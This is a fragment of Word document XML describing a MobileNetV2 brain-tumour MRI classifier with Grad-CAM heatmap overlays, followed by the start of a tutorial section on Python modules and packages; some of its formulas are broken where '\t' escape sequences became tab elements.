    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforces three color channels (RGB) using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>selected_image.convert("RGB")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resizes spatial dimensions to $(224, 224)$ via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cv2.resize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Casts data type from 8-bit unsigned integer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uint8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, $[0, 255]$) to 32-bit floating point (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>float32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expands tensor dimensions to add the batch axis: shape becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 224, 224, 3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Scales pixel intensities to the interval $[-1.0, 1.0]$ using MobileNetV2's dedicated normalization formula: $</w:t>
        <w:tab/>
        <w:t>ext{pixel}_{</w:t>
        <w:tab/>
        <w:t>ext{norm}} = \frac{</w:t>
        <w:tab/>
        <w:t>ext{pixel}}{127.5} - 1.0$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A standardized 4D tensor ready for mathematical operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. Convolutional Feature Extractor (MobileNetV2 Base)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The preprocessed tensor of shape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 224, 224, 3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Passes activations through 53 inverted residual convolutional blocks with depthwise separable filters. Low-level layers detect micro-edges and contrast gradients; middle layers detect contours and tissue boundaries; the final convolutional layer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>out_relu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) detects high-level semantic patterns characteristic of intracranial tumors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A feature activation map of shape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 7, 7, 1280)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. Classification Head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 7, 7, 1280)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collapses spatial dimensions via Global Average Pooling to a 1D vector of length 1,280.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Normalizes channel statistics with Batch Normalization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Applies 30% Dropout to prevent co-adaptation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Computes 128 non-linear feature combinations using a Dense ReLU layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Applies 20% Dropout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Computes final class unnormalized log-probabilities and passes them through a 4-way Softmax function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A probability distribution vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>probs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of length 4 summing to $1.0$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. Grad-CAM Explainability Engine (`compute_gradcam`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The input image tensor, the outer model, and the base model reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Opens a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.GradientTape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Watches the convolutional feature maps at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>out_relu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Forward-propagates activations through the classification head to isolate the score of the predicted class ($y^c$).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Backpropagates to extract the gradients $\frac{\partial y^c}{\partial A^k}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Spatially pools the gradients to compute channel importance weights $\alpha_k^c$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Takes the weighted sum of feature maps and clips negative values via ReLU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Normalizes values between $0.0$ and $1.0$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A 2D saliency heatmap array of shape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(7, 7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7. Diagnostic Compositor (`create_superimposed_overlay`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The raw $224 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 224$ RGB image array, the $7 </w:t>
        <w:tab/>
        <w:t>imes 7$ float heatmap, and an overlay alpha parameter ($0.45$).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Upsamples the $7 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 7$ heatmap to $224 </w:t>
        <w:tab/>
        <w:t>imes 224$ using bilinear interpolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Converts float values $[0.0, 1.0]$ to 8-bit unsigned integers $[0, 255]$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Maps single-channel intensities to an RGB thermal palette using OpenCV's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>COLORMAP_JET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (high values = red/yellow, low values = deep blue).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Blends the original scan with the thermal map: $</w:t>
        <w:tab/>
        <w:t>ext{Pixel}_{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{out}} = (1 - \alpha) \cdot </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ext{Scan} + \alpha \cdot </w:t>
        <w:tab/>
        <w:t>ext{JetMap}$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A composite 3-channel image array highlighting the lesion site.</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4: Python Modules, Packages, and Imports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.1 Theoretical Foundation: Modules, Packages, Libraries, Classes, Functions, and Objects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To speak like a seasoned software engineer, you must clearly distinguish these six core programming concepts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Module:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A single Python file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) containing executable code, functions, classes, and variables. For example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Package:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A directory containing multiple Python modules, organized hierarchically, and traditionally accompanied by an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__init__.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. For example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tensorflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
